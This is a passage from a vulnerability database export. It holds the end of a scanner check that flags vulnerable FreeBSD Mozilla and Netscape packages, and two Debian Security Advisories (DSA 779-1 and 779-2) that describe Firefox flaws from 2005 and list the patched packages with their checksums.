b:\"0\")>=0) {\n txt += 'Package ja-linux-mozillafirebird-gtk1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-mozillafirebird-gtk2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ja-mozillafirebird-gtk2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozillafirebird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package linux-mozillafirebird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-linux-mozillafirebird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ru-linux-mozillafirebird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"zhCN-linux-mozillafirebird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package zhCN-linux-mozillafirebird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"zhTW-linux-mozillafirebird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package zhTW-linux-mozillafirebird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"de-linux-netscape\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package de-linux-netscape version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"de-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package de-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"fr-linux-netscape\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package fr-linux-netscape version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"fr-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package fr-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-linux-netscape\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ja-linux-netscape version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package ja-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-netscape\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package linux-netscape version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-phoenix\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package linux-phoenix version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mozilla+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-embedded\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mozilla-embedded version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-firebird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mozilla-firebird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-gtk1\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mozilla-gtk1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-gtk2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mozilla-gtk2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-gtk\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mozilla-gtk version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mozilla-thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"phoenix\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package phoenix version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"pt_BR-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package pt_BR-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:16:19", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 779-2 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nSeptember 1st, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mozilla-firefox\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-2260 CAN-2005-2261 CAN-2005-2262 CAN-2005-2263\n CAN-2005-2264 CAN-2005-2265 CAN-2005-2266 CAN-2005-2267\n CAN-2005-2268 CAN-2005-2269 CAN-2005-2270 \nBugTraq ID : 14242\nDebian Bug : 318061\n\nWe experienced that the update for Mozilla Firefox from DSA 779-1\nunfortunately was a regression in several cases. Since the usual\npraxis of backporting apparently does not work, this update is\nbasically version 1.0.6 with the version number rolled back, and hence\nstill named 1.0.4-*. For completeness below is the original advisory\ntext:\n\n Several problems have been discovered in Mozilla Firefox, a\n lightweight web browser based on Mozilla. The Common Vulnerabilities\n and Exposures project identifies the following problems:\n\n CAN-2005-2260\n\n The browser user interface does not properly distinguish between\n user-generated events and untrusted synthetic events, which makes\n it easier for remote attackers to perform dangerous actions that\n normally could only be performed manually by the user.\n\n CAN-2005-2261\n\n XML scripts ran even when Javascript disabled.\n\n CAN-2005-2262\n\n The user can be tricked to executing arbitrary JavaScript code by\n using a JavaScript URL as wallpaper.\n\n CAN-2005-2263\n\n It is possible for a remote attacker to execute a callback\n function in the context of another domain (i.e. frame).\n\n CAN-2005-2264\n\n By opening a malicious link in the sidebar it is possible for\n remote attackers to steal sensitive information.\n\n CAN-2005-2265\n\n Missing input sanitising of InstallVersion.compareTo() can cause\n the application to crash.\n\n CAN-2005-2266\n\n Remote attackers could steal sensitive information such as cookies\n and passwords from web sites by accessing data in alien frames.\n\n CAN-2005-2267\n\n By using standalone applications such as Flash and QuickTime to\n open a javascript: URL, it is possible for a remote attacker to\n steal sensitive information and possibly execute arbitrary code.\n\n CAN-2005-2268\n\n It is possible for a Javascript dialog box to spoof a dialog box\n from a trusted site and facilitates phishing attacks.\n\n CAN-2005-2269\n\n Remote attackers could modify certain tag properties of DOM nodes\n that could lead to the execution of arbitrary script or code.\n\n CAN-2005-2270\n\n The Mozilla browser familie does not properly clone base objects,\n which allows remote attackers to execute arbitrary code.\n\nThe old stable distribution (woody) is not affected by these problems.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.0.4-2sarge3.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.0.6-1.\n\nWe recommend that you upgrade your Mozilla Firefox packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3.dsc\n Size/MD5 checksum: 1001 e9e343d5899bc10b64650464839db1dc\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3.diff.gz\n Size/MD5 checksum: 323682 3e07c7d42de155ed01210386bc2f06f7\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz\n Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_alpha.deb\n Size/MD5 checksum: 11162870 103e4b84e9d2052cb4260b96e41319aa\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_alpha.deb\n Size/MD5 checksum: 166886 906bfa51b6c0cb8966fe06aec2b5816e\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_alpha.deb\n Size/MD5 checksum: 58708 1b3025f62bb3cb67b32c73c9f20ac5ba\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_amd64.deb\n Size/MD5 checksum: 9397790 6b14119f896013d55826cb59dac50c3b\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_amd64.deb\n Size/MD5 checksum: 161636 33635aa0e4e18a2f8868bb49969a37a6\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_amd64.deb\n Size/MD5 checksum: 57194 a46c10258c9929c8e9f8001838dc4fe4\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_arm.deb\n Size/MD5 checksum: 8216696 f39cae6e1e57a572c316c14cc6c0b3d6\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_arm.deb\n Size/MD5 checksum: 153076 c634b6a8d6f42008526607877071bcaa\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_arm.deb\n Size/MD5 checksum: 52548 04b5b1e840e77b56837e1991c11a9ff6\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_i386.deb\n Size/MD5 checksum: 8889628 c7730b4e3df2f6a0bb12186a52884a9e\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_i386.deb\n Size/MD5 checksum: 156844 806fd550f9a5283e4fab73443c73fbcd\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_i386.deb\n Size/MD5 checksum: 54096 9eb9d71896406a619bd186bfe10ed0f2\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_ia64.deb\n Size/MD5 checksum: 11617476 564858f6b1f36f84a1fa9e8c7cb71316\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_ia64.deb\n Size/MD5 checksum: 167224 b574fe291d5537628022434ef13c9587\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_ia64.deb\n Size/MD5 checksum: 61876 4625f067b0cdb1a0de04829a9edbc6d7\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_hppa.deb\n Size/MD5 checksum: 10266194 05ebaf745a3854b8a4dc8dd0e1cff53c\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_hppa.deb\n Size/MD5 checksum: 164592 902df65efa25b497b99a62d1a38acc2e\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_hppa.deb\n Size/MD5 checksum: 57692 2221b941de975d360a6f2123d83a73ea\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_m68k.deb\n Size/MD5 checksum: 8167252 23f5666813a7118b5a1e841337b2b9aa\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_m68k.deb\n Size/MD5 checksum: 155742 f46394239362846cfdbe2f2d316bbc18\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_m68k.deb\n Size/MD5 checksum: 53352 619ac605ca4c6d0b449f6b2652b76463\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_mips.deb\n Size/MD5 checksum: 9919620 0f246fc3335b23e9975d78b0f86a2682\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_mips.deb\n Size/MD5 checksum: 154596 90a7786ea46368235be9b052b07eb7d0\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_mips.deb\n Size/MD5 checksum: 54366 ccec0a41faf2945c6ec426311fe4bf77\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_mipsel.deb\n Size/MD5 checksum: 9803502 117b7e5ea7a0d7b78518218009024eaa\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_mipsel.deb\n Size/MD5 checksum: 154172 a090df008b2336d500d772cf538dbe3e\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_mipsel.deb\n Size/MD5 checksum: 54180 1dde88657a7740f8261f8804a5bc3a13\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_powerpc.deb\n Size/MD5 checksum: 8561832 f6dd2ad6a53d96b8779fcecd022733ae\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_powerpc.deb\n Size/MD5 checksum: 155236 88e76f256f6aa39c93ca73b95141e6fc\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_powerpc.deb\n Size/MD5 checksum: 56482 1525d1b14855694f62110a8fd2ad4b61\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_s390.deb\n Size/MD5 checksum: 9635736 770eca99436ee1646cc9af8eb1f4bce4\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_s390.deb\n Size/MD5 checksum: 162228 c17de607a44ebdd3838d07a8d784f9b8\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_s390.deb\n Size/MD5 checksum: 56664 ead0e97932f0bc9ad8c756d46cf6540f\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge3_sparc.deb\n Size/MD5 checksum: 8651242 7b87e6d2fca175b70259035c0d5506cf\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge3_sparc.deb\n Size/MD5 checksum: 155458 2ae1ce848a6ea81a485f2f1240f894cc\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge3_sparc.deb\n Size/MD5 checksum: 52906 89b1bb81288c9fa1f156ba6354292484\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2005-09-01T00:00:00", "published": "2005-09-01T00:00:00", "id": "DEBIAN:DSA-779-2:6DF02", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00182.html", "title": "[SECURITY] [DSA 779-2] New Mozilla Firefox packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:12:31", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 779-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nAugust 20th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mozilla-firefox\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-2260 CAN-2005-2261 CAN-2005-2262 CAN-2005-2263\n CAN-2005-2264 CAN-2005-2265 CAN-2005-2266 CAN-2005-2267\n CAN-2005-2268 CAN-2005-2269 CAN-2005-2270 \nBugTraq ID : 14242\nDebian Bug : 318061\n\nSeveral problems have been discovered in Mozilla Firefox, a\nlightweight web browser based on Mozilla. The Common Vulnerabilities\nand Exposures project identifies the following problems:\n\nCAN-2005-2260\n\n The browser user interface does not properly distinguish between\n user-generated events and untrusted synthetic events, which makes\n it easier for remote attackers to perform dangerous actions that\n normally could only be performed manually by the user.\n\nCAN-2005-2261\n\n XML scripts ran even when Javascript disabled.\n\nCAN-2005-2262\n\n The user can be tricked to executing arbitrary JavaScript code by\n using a JavaScript URL as wallpaper.\n\nCAN-2005-2263\n\n It is possible for a remote attacker to execute a callback\n function in the context of another domain (i.e. frame).\n\nCAN-2005-2264\n\n By opening a malicious link in the sidebar it is possible for\n remote attackers to steal sensitive information.\n\nCAN-2005-2265\n\n Missing input sanitising of InstallVersion.compareTo() can cause\n the application to crash.\n\nCAN-2005-2266\n\n Remote attackers could steal sensitive information such as cookies\n and passwords from web sites by accessing data in alien frames.\n\nCAN-2005-2267\n\n By using standalone applications such as Flash and QuickTime to\n open a javascript: URL, it is possible for a remote attacker to\n steal sensitive information and possibly execute arbitrary code.\n\nCAN-2005-2268\n\n It is possible for a Javascript dialog box to spoof a dialog box\n from a trusted site and facilitates phishing attacks.\n\nCAN-2005-2269\n\n Remote attackers could modify certain tag properties of DOM nodes\n that could lead to the execution of arbitrary script or code.\n\nCAN-2005-2270\n\n The Mozilla browser familie does not properly clone base objects,\n which allows remote attackers to execute arbitrary code.\n\nThe old stable distribution (woody) is not affected by these problems.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.0.4-2sarge2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.0.6-1.\n\nWe recommend that you upgrade your Mozilla Firefox packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2.dsc\n Size/MD5 checksum: 1001 a5cf2fc8bc04662e6c192c15666011e4\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2.diff.gz\n Size/MD5 checksum: 285974 45e66f5ddde0d5c016fd15268da0e522\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz\n Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_alpha.deb\n Size/MD5 checksum: 11162656 4c8e579214a7bd4030303c6e33ec95f7\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_alpha.deb\n Size/MD5 checksum: 166698 027d4c7fddb899faff3ef9928864bb71\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_alpha.deb\n Size/MD5 checksum: 58528 2cff714da9bf45d1112621132f9fc940\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_amd64.deb\n Size/MD5 checksum: 9396736 0a28ce7a8f6f783f16c201fc0daf6e0a\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_amd64.deb\n Size/MD5 checksum: 161458 f9384873ae04a233001b37088abc510a\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_amd64.deb\n Size/MD5 checksum: 57012 b09a95b0f7587001540398f1a5fce173\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_arm.deb\n Size/MD5 checksum: 8216228 9ca98872228db6ba98cf5123d642fc4b\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_arm.deb\n Size/MD5 checksum: 152944 e0dc5a23ec713373753bcdf4e774c6f7\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_arm.deb\n Size/MD5 checksum: 52362 decd529d18ee714bcf2dbe5a82e53e37\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_i386.deb\n Size/MD5 checksum: 8887610 54e66239bff8195d09a76a8b0c65e096\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_i386.deb\n Size/MD5 checksum: 156664 e40d4387cdf627df5706e8a83f39640d\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_i386.deb\n Size/MD5 checksum: 53906 3bc7062690df1334a92eeeae36819ea0\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_ia64.deb\n Size/MD5 checksum: 11615046 5b41f9a2f87e8bc9017c94cd5b24b180\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_ia64.deb\n Size/MD5 checksum: 167044 67972c83f83c325861b21ff6486519e9\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_ia64.deb\n Size/MD5 checksum: 61720 86ecafea4b179e1739ea521402d2e53b\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_hppa.deb\n Size/MD5 checksum: 10264776 822d581c33a2628807fd955c1a72a66a\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_hppa.deb\n Size/MD5 checksum: 164432 bf6da3e624453a2b9669f889e56c0a76\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_hppa.deb\n Size/MD5 checksum: 57512 aa8ee4e91cdead5a455a70c3608ba85e\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_m68k.deb\n Size/MD5 checksum: 8166186 6ae9415318e2156f420b1926936f28b6\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_m68k.deb\n Size/MD5 checksum: 155562 54c6667bd665e961b5bd45c2b44df43d\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_m68k.deb\n Size/MD5 checksum: 53176 7c3a5484eb5d7155181653d25f927af1\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_mips.deb\n Size/MD5 checksum: 9917724 bc430e659978ea1114dc38c0982a5917\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_mips.deb\n Size/MD5 checksum: 154452 84399a208bda215a7983bc2f35f30bd2\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_mips.deb\n Size/MD5 checksum: 54188 f6ea0de213759e27da7dc5c06c6a5e57\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_mipsel.deb\n Size/MD5 checksum: 9802342 7e995ec5e6ee01d2ebc86d8e6e77d58a\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_mipsel.deb\n Size/MD5 checksum: 154006 110274d1994cfe33062244e28ee04fd6\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_mipsel.deb\n Size/MD5 checksum: 54012 83610c805d36e4cea229cab960a06e32\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_powerpc.deb\n Size/MD5 checksum: 8560170 ac40dd1ebef525009556eac5f5dbeff3\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_powerpc.deb\n Size/MD5 checksum: 155046 ab31c9d12c13b9e63a4af5f8babcb6ad\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_powerpc.deb\n Size/MD5 checksum: 56300 dab2c4918f383416a2418c2327988cc1\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_s390.deb\n Size/MD5 checksum: 9635642 2514b2a60f87aedff82c0d5c29f53f25\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_s390.deb\n Size/MD5 checksum: 162076 2a3fe0537ebeebc2ea9f1a3aa952279c\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_s390.deb\n Size/MD5 checksum: 56488 a914c752690bc8abcb6ad247d73dc041\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_sparc.deb\n Size/MD5 checksum: 8649734 60765d2a2480a9aa5b45d288a2d6df65\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_sparc.deb\n Size/MD5 checksum: 155298 9aab4bf6a3a7187243b60b044ed4d80c\n http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_sparc.deb\n Size/MD5 checksum: 52734 5af8d15d55aa1d13e80776e1079c2007\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2005-08-20T00:00:00", "published": "2005-08-20T00:00:00", "id": "DEBIAN:DSA-779-1:77CE3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00167.html", "title": "[SECURITY] [DSA 779-1] New Mozilla Firefox packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", 